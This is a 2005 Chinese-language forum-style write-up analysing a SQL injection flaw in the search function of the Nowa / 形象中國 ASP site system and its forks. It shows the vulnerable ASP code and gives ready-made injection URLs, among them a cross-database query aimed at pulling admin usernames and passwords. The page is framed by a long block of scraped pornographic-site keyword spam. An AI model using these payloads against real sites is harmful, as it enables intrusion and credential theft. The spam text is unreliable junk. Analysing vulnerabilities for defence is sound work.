国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

對形象中國全站系統的搜索注入漏洞的一點分析
2005-12-17   

首先聲明,這個漏洞不是我發現的,我只是作了一次的分析,不足之處請不吝指教。
這個站點在當初被認為是比較安全的全站系統,事實上現在也是。(后來的補丁里出現了上傳漏洞,不在討論之列。)因此這個系統被改編為很多版本:
Nowa 0.94版本(原版)
形象中國整站(修改版本)
藍雨整站(修改版本)
落日整站(修改版本)
流星整站(修改版本)---------------------------------------------(感謝hak_ban提供)
我的站http://www.918x.com就是這個系統的,還有很多的站點用到這個系統(包括小路的666w.com,嘿嘿)。
我們先來看漏洞文件的原代碼:
<%sub article_body()
dim totalart,Currentpage,totalpages,i,j,colname
openarticle
sql="select art_id,cat_id,art_title,art_date,art_count from art order by art_date DESC"
if request("cat_id")<>"" then
sql="select art_id,cat_id,art_title,art_date,art_count from art where cat_id="&request("cat_id")&" order by art_date DESC"
elseif request("keyword")<>"" then
sql="select art_id,cat_id,art_title,art_date,art_count from art where "&request("select")&" like %"&request("keyword")&"%order by art_date DESC"
elseif request("cat_id")<>"" and request("keyword")<>"" then
sql="select art_id,cat_id,art_title,art_date,art_count from art where art_title or art_content like %"&request("keyword")&"%order by art_date DESC"
end if
set rs=server.createobject("adodb.recordset")
rs.open sql,conn,1,1
%>
關鍵這句:sql="select art_id,cat_id,art_title,art_date,art_count from art where "&request("select")&" like %"&request("keyword")&"%order by art_date DESC"
我們從另一個文件FORMAT.asp里發現文件對request的keyword變量進行了過濾,卻沒有對request的select進行有 效檢查。
所以當我們提交(%20是空格)
_title&keyword=1%20and%201=1" target=_blank>http://www.918x.com/article.asp?select=art_title&keyword=1%20and%201=1
是不成功的,但是提交:
_blank>http://www.918x.com/article.asp? keyword=1&select=art_title%20and%201=1
_blank>http://www.918x.com/article.asp? keyword=1&select=art_title%20and%201=2
就能成功的達到注入的目的。
整個文章系統有兩處搜索,除了article.asp還有download.asp,于是看了看代碼,卻沒有發現&request("select"),而是直接把soft_name等放在查詢中,看起來好象這兩個查詢不是同一個人寫的。
再來說說利用。我們知道,這個整站有5個數據庫,密碼保存在admin.mdb里(默認情況下)。
而上述注入只是征對article.mdb的。我們最多能夠暴出article.mdb表里的數據。
那能不能跨庫查詢呢?
首先我必須知道保存admin的數據庫的名字,假設為admin.asp,我們還需要知道數據庫的物理路徑,假設為d:\web\data\ 然后如下查詢:
_blank>http://www.918x.com/article.asp? keyword=1&select=art_title%20and %200<>(select%20count(*)%20from%20d:\web\data\admin.asp.admin%20where%20admin_name)
_blank>http://www.918x.com/article.asp? keyword=1&select=art_title%20and %200<>(select%20count(*)%20from%20d:\web\data\admin.asp.admin%20where%20admin_password)
返回成功,則說明有admin表和admin_name,admin_password列。
接下來便可以注入,暴出用戶名和密碼來。我就不多說了,大家都會的。
這種情況適用于
1.知道數據庫的物理路徑
2.數據庫不在可訪問的web目錄里,在上級目錄,或者其他地方,或者數據庫作了防下載處理(否則我們可以直接下載admin數據庫,又何必注入那么麻煩呢。)
總的來說利用的價值不大,何況20040415的補丁使得密碼還是md5加密的

熱詞搜索:

上一篇:PHP+MySQL注入導出文件的新發現-附帶IPB2的漏洞利用
下一篇:IPB2注入漏洞的深入利用

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
国语自产在线不卡| 亚洲在线播放电影| 久久久久久网站| 亚洲人成啪啪网站| 国产日韩欧美在线播放| 欧美激情一区二区| 久久女同互慰一区二区三区| 欧美一级久久久| 亚洲午夜黄色| 亚洲少妇在线| 亚洲无毛电影| 亚洲一区在线免费观看| 一本综合久久| 亚洲小说春色综合另类电影| 在线性视频日韩欧美| 亚洲乱码国产乱码精品精天堂 | 欧美制服丝袜| 欧美在线视频观看| 久久久久久69| 久久综合九色综合欧美狠狠| 久久久亚洲国产美女国产盗摄| 久久久欧美精品sm网站| 久久艳片www.17c.com| 欧美自拍偷拍午夜视频| 久久久噜噜噜久噜久久| 欧美视频你懂的| 亚洲手机视频| 亚洲影视中文字幕| 欧美在线播放一区| 久久综合电影| 欧美国产视频日韩| 国产精品久99| 国产一区二区三区精品欧美日韩一区二区三区 | 嫩草影视亚洲| 99v久久综合狠狠综合久久| 99国产精品99久久久久久| 中日韩午夜理伦电影免费| 在线综合+亚洲+欧美中文字幕| 亚洲一二三四区| 久久精品国产免费观看| 欧美96在线丨欧| 欧美日韩中文字幕| 国产丝袜美腿一区二区三区| 1024成人网色www| 一区二区成人精品 | 狠狠色狠狠色综合日日91app| 国内精品久久久| 亚洲精品久久久久久下一站| 亚洲视频免费看| 久久久夜夜夜| 欧美日韩美女| 激情久久中文字幕| 一本色道久久综合亚洲精品不卡 | 国产三级欧美三级| 亚洲人成亚洲人成在线观看图片| 国产精品99久久久久久白浆小说| 久久久久久精| 国产精品久久久久影院色老大| 免费在线成人| 国产一区自拍视频| 欧美三区在线| 亚洲国产精品久久久久婷婷884| 一本大道av伊人久久综合| 久久av资源网站| 国产精品草草| 亚洲精品免费网站| 久久久久久穴| 国产欧美精品日韩区二区麻豆天美| 亚洲韩国日本中文字幕| 欧美在线一区二区三区| 国产精品麻豆欧美日韩ww| 亚洲国产日韩欧美综合久久| 新67194成人永久网站| 欧美日韩一区二区精品| 在线日韩欧美视频| 久久国产福利| 国产精品毛片a∨一区二区三区| 136国产福利精品导航网址应用| 香蕉成人伊视频在线观看| 欧美激情一区二区三区高清视频| 狠狠色狠狠色综合日日五| 午夜精品成人在线| 国产精品成人观看视频免费| 亚洲九九九在线观看| 免费观看30秒视频久久| 国产一区二区久久久| 欧美一区二区福利在线| 国产精品色在线| 亚洲免费网站| 久久不见久久见免费视频1| 校园春色综合网| 国产精品久久久久久超碰| 99国产精品自拍| 欧美精品首页| 日韩亚洲精品在线| 欧美精品激情在线观看| 91久久在线观看| 欧美日本国产在线| 免费一级欧美片在线播放| 国产精品高潮在线| 亚洲欧美日韩综合aⅴ视频| 国产精品久久久一区二区三区| 在线亚洲一区观看| 国产精品国产自产拍高清av| 亚洲一区二区在线视频| 国产欧美精品xxxx另类| 久久精品国产999大香线蕉| 一区二区视频免费在线观看| 久久偷窥视频| 日韩一级在线观看| 国产精品激情偷乱一区二区∴| 午夜精品国产| 禁久久精品乱码| 久久久中精品2020中文| 亚洲激情专区| 欧美日韩精品一区| 午夜性色一区二区三区免费视频| 国内精品久久久久伊人av| 欧美91视频| 亚洲欧美日韩综合| 久久久精品五月天| 亚洲人成在线观看| 国产精品一区二区在线| 久久婷婷色综合| 在线亚洲激情| 国外成人免费视频| 欧美日韩一区精品| 久久久久久久尹人综合网亚洲 | 久久精品国产999大香线蕉| 国产一区二区三区四区hd| 欧美成人精品三级在线观看| 宅男噜噜噜66国产日韩在线观看| 国产深夜精品| 欧美另类videos死尸| 欧美一级大片在线观看| 亚洲欧洲综合| 国内成人精品2018免费看| 国产精品播放| 欧美精品三级日韩久久| 久久精品视频免费观看| 在线亚洲一区| 欧美日韩国产综合久久| 久久九九免费视频| 亚洲中无吗在线| 亚洲精品国产欧美| 一区二区三区在线免费视频| 国产精品欧美风情| 欧美日韩爆操| 欧美成人一品| 久久亚洲精品一区二区| 欧美亚洲免费电影| 亚洲一级黄色| 99精品视频免费| 亚洲三级观看| 亚洲成色精品| 在线观看的日韩av| 亚洲欧美精品| 国产精品乱人伦中文| 欧美精品三级| 欧美www视频| 久久免费99精品久久久久久| 亚洲女女女同性video| 在线亚洲精品福利网址导航| 亚洲精品综合精品自拍| 亚洲黄色天堂| 亚洲国产婷婷| 亚洲人成人一区二区三区| 韩国成人理伦片免费播放| 国产欧美va欧美不卡在线| 国产精品毛片在线| 国产精品福利片| 国产精品外国| 国产日韩在线不卡| 国产日韩精品视频一区| 国产日产精品一区二区三区四区的观看方式| 欧美日韩综合久久| 欧美日韩在线视频一区| 欧美日韩一区二区三区在线观看免| 欧美日韩美女一区二区| 欧美日在线观看| 国产精品久久久久久影视| 午夜精品一区二区三区在线| 欧美一级理论片| 久久激情一区| 欧美成va人片在线观看| 欧美高清在线视频| 欧美日韩一区三区四区| 国产精品日韩精品欧美精品| 国产欧美在线| 亚洲成人在线| 日韩午夜在线电影| 亚洲永久精品国产| 久久国产精品黑丝| 欧美成人精品h版在线观看| 欧美精品97| 国产裸体写真av一区二区| 狠狠综合久久| 日韩一级视频免费观看在线| 亚洲欧美综合国产精品一区| 欧美在线播放|